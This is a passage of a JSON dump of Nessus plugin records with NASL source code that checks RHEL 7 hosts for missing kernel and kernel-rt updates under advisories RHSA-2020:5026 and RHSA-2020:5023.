package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['rpm_prefix'])) rpm_prefix = package_array['rpm_prefix'];\n if (reference && release) {\n if (rpm_prefix) {\n if (rpm_exists(release:release, rpm:rpm_prefix) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'bpftool / kernel / kernel-abi-whitelists / etc');\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-25T13:54:04", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:5026 advisory.\n\n - kernel: net-sysfs: *_queue_add_kobject refcount issue (CVE-2019-20811)\n\n - kernel: kernel: buffer over write in vgacon_scroll (CVE-2020-14331)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 4, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-11T00:00:00", "title": "RHEL 7 : kernel-rt (RHSA-2020:5026)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14331", "CVE-2019-20811"], "modified": "2020-11-11T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel", "cpe:/a:redhat:rhel_extras_rt:7", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-rt"], "id": "REDHAT-RHSA-2020-5026.NASL", "href": "https://www.tenable.com/plugins/nessus/142706", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:5026. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142706);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/24\");\n\n script_cve_id(\"CVE-2019-20811\", \"CVE-2020-14331\");\n script_xref(name:\"RHSA\", value:\"2020:5026\");\n\n script_name(english:\"RHEL 7 : kernel-rt (RHSA-2020:5026)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:5026 advisory.\n\n - kernel: net-sysfs: *_queue_add_kobject refcount issue (CVE-2019-20811)\n\n - kernel: kernel: buffer over write in vgacon_scroll (CVE-2020-14331)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/460.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/787.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-20811\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:5026\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1846439\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1858679\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14331\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(460, 787);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:rhel_extras_rt:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-kvm\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('ksplice.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'rhel_extras_rt_7': [\n 'rhel-7-server-nfv-debug-rpms',\n 'rhel-7-server-nfv-rpms',\n 'rhel-7-server-nfv-source-rpms',\n 'rhel-7-server-rt-debug-rpms',\n 'rhel-7-server-rt-rpms',\n 'rhel-7-server-rt-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2020:5026');\n}\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n rm_kb_item(name:'Host/uptrack-uname-r');\n cve_list = make_list('CVE-2019-20811', 'CVE-2020-14331');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for RHSA-2020:5026');\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\npkgs = [\n {'reference':'kernel-rt-3.10.0-1160.6.1.rt56.1139.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_extras_rt_7']},\n {'reference':'kernel-rt-debug-3.10.0-1160.6.1.rt56.1139.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_extras_rt_7']},\n {'reference':'kernel-rt-debug-devel-3.10.0-1160.6.1.rt56.1139.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_extras_rt_7']},\n {'reference':'kernel-rt-debug-kvm-3.10.0-1160.6.1.rt56.1139.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_extras_rt_7']},\n {'reference':'kernel-rt-devel-3.10.0-1160.6.1.rt56.1139.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_extras_rt_7']},\n {'reference':'kernel-rt-doc-3.10.0-1160.6.1.rt56.1139.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_extras_rt_7']},\n {'reference':'kernel-rt-kvm-3.10.0-1160.6.1.rt56.1139.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_extras_rt_7']},\n {'reference':'kernel-rt-trace-3.10.0-1160.6.1.rt56.1139.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_extras_rt_7']},\n {'reference':'kernel-rt-trace-devel-3.10.0-1160.6.1.rt56.1139.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_extras_rt_7']},\n {'reference':'kernel-rt-trace-kvm-3.10.0-1160.6.1.rt56.1139.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_extras_rt_7']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kernel-rt / kernel-rt-debug / kernel-rt-debug-devel / etc');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-25T13:54:03", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:5023 advisory.\n\n - kernel: net-sysfs: *_queue_add_kobject refcount issue (CVE-2019-20811)\n\n - kernel: kernel: buffer over write in vgacon_scroll (CVE-2020-14331)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 4, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-11T00:00:00", "title": "RHEL 7 : kernel (RHSA-2020:5023)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14331", "CVE-2019-20811"], "modified": "2020-11-11T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7::server", "p-cpe:/a:redhat:enterprise_linux:bpftool", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "cpe:/o:redhat:enterprise_linux:7::computenode", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-bootwrapper", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:7::workstation", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "cpe:/o:redhat:enterprise_linux:7::client"], "id": "REDHAT-RHSA-2020-5023.NASL", "href": "https://www.tenable.com/plugins/nessus/142709", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:5023. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142709);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/24\");\n\n script_cve_id(\"CVE-2019-20811\", \"CVE-2020-14331\");\n script_xref(name:\"RHSA\", value:\"2020:5023\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2020:5023)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:5023 advisory.\n\n - kernel: net-sysfs: *_queue_add_kobject refcount issue (CVE-2019-20811)\n\n - kernel: kernel: buffer over write in vgacon_scroll (CVE-2020-14331)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/460.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/787.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-20811\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:5023\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1846439\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1858679\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14331\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(460, 787);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7::client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7::computenode\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7::workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bpftool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-bootwrapper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('ksplice.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'enterprise_linux_7_client': [\n 'rhel-7-desktop-debug-rpms',\n 'rhel-7-desktop-fastrack-debug-rpms',\n 'rhel-7-desktop-fastrack-rpms',\n 'rhel-7-desktop-fastrack-source-rpms',\n 'rhel-7-desktop-optional-debug-rpms',\n 'rhel-7-desktop-optional-fastrack-debug-rpms',\n 'rhel-7-desktop-optional-fastrack-rpms',\n 'rhel-7-desktop-optional-fastrack-source-rpms',\n 'rhel-7-desktop-optional-rpms',\n 'rhel-7-desktop-optional-source-rpms',\n 'rhel-7-desktop-rpms',\n 'rhel-7-desktop-source-rpms'\n ],\n 'enterprise_linux_7_computenode': [\n 'rhel-7-for-hpc-node-fastrack-debug-rpms',\n 'rhel-7-for-hpc-node-fastrack-rpms',\n 'rhel-7-for-hpc-node-fastrack-source-rpms',\n 'rhel-7-for-hpc-node-optional-fastrack-debug-rpms',\n 'rhel-7-for-hpc-node-optional-fastrack-rpms',\n 'rhel-7-for-hpc-node-optional-fastrack-source-rpms',\n 'rhel-7-hpc-node-debug-rpms',\n 'rhel-7-hpc-node-optional-debug-rpms',\n 'rhel-7-hpc-node-optional-rpms',\n 'rhel-7-hpc-node-optional-source-rpms',\n 'rhel-7-hpc-node-rpms',\n 'rhel-7-hpc-node-source-rpms'\n ],\n 'enterprise_linux_7_server': [\n 'rhel-7-for-system-z-a-debug-rpms',\n 'rhel-7-for-system-z-a-optional-debug-rpms',\n 'rhel-7-for-system-z-a-optional-rpms',\n 'rhel-7-for-system-z-a-optional-source-rpms',\n 'rhel-7-for-system-z-a-rpms',\n 'rhel-7-for-system-z-a-source-rpms',\n 'rhel-7-for-system-z-debug-rpms',\n 'rhel-7-for-system-z-fastrack-debug-rpms',\n 'rhel-7-for-system-z-fastrack-rpms',\n 'rhel-7-for-system-z-fastrack-source-rpms',\n 'rhel-7-for-system-z-optional-debug-rpms',\n 'rhel-7-for-system-z-optional-fastrack-debug-rpms',\n 'rhel-7-for-system-z-optional-fastrack-rpms',\n 'rhel-7-for-system-z-optional-fastrack-source-rpms',\n 'rhel-7-for-system-z-optional-rpms',\n 'rhel-7-for-system-z-optional-source-rpms',\n 'rhel-7-for-system-z-rpms',\n 'rhel-7-for-system-z-source-rpms',\n 'rhel-7-server-debug-rpms',\n 'rhel-7-server-fastrack-debug-rpms',\n 'rhel-7-server-fastrack-rpms',\n 'rhel-7-server-fastrack-source-rpms',\n 'rhel-7-server-optional-debug-rpms',\n 'rhel-7-server-optional-fastrack-debug-rpms',\n 'rhel-7-server-optional-fastrack-rpms',\n 'rhel-7-server-optional-fastrack-source-rpms',\n 'rhel-7-server-optional-rpms',\n 'rhel-7-server-optional-source-rpms',\n 'rhel-7-server-rpms',\n 'rhel-7-server-source-rpms',\n 'rhel-ha-for-rhel-7-for-system-z-debug-rpms',\n 'rhel-ha-for-rhel-7-for-system-z-rpms',\n 'rhel-ha-for-rhel-7-for-system-z-source-rpms',\n 'rhel-ha-for-rhel-7-server-debug-rpms',\n 'rhel-ha-for-rhel-7-server-rpms',\n 'rhel-ha-for-rhel-7-server-source-rpms',\n 'rhel-rs-for-rhel-7-for-system-z-debug-rpms',\n 'rhel-rs-for-rhel-7-for-system-z-rpms',\n 'rhel-rs-for-rhel-7-for-system-z-source-rpms',\n 'rhel-rs-for-rhel-7-server-debug-rpms',\n 'rhel-rs-for-rhel-7-server-rpms',\n 'rhel-rs-for-rhel-7-server-source-rpms'\n ],\n 'enterprise_linux_7_workstation': [\n 'rhel-7-workstation-debug-rpms',\n 'rhel-7-workstation-fastrack-debug-rpms',\n 'rhel-7-workstation-fastrack-rpms',\n 'rhel-7-workstation-fastrack-source-rpms',\n 'rhel-7-workstation-optional-debug-rpms',\n 'rhel-7-workstation-optional-fastrack-debug-rpms',\n 'rhel-7-workstation-optional-fastrack-rpms',\n 'rhel-7-workstation-optional-fastrack-source-rpms',\n 'rhel-7-workstation-optional-rpms',\n 'rhel-7-workstation-optional-source-rpms',\n 'rhel-7-workstation-rpms',\n 'rhel-7-workstation-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2020:5023');\n}\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n rm_kb_item(name:'Host/uptrack-uname-r');\n cve_list = make_list('CVE-2019-20811', 'CVE-2020-14331');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for RHSA-2020:5023');\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\npkgs = [\n {'reference':'bpftool-3.10.0-1160.6.1.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'bpftool-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'kernel-3.10.0-1160.6.1.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'kernel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'kernel-abi-whitelists-3.10.0-1160.6.1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'kernel-debug-3.10.0-1160.6.1.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'kernel-debug-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'kernel-debug-devel-3.10.0-1160.6.1.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'kernel-debug-devel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n 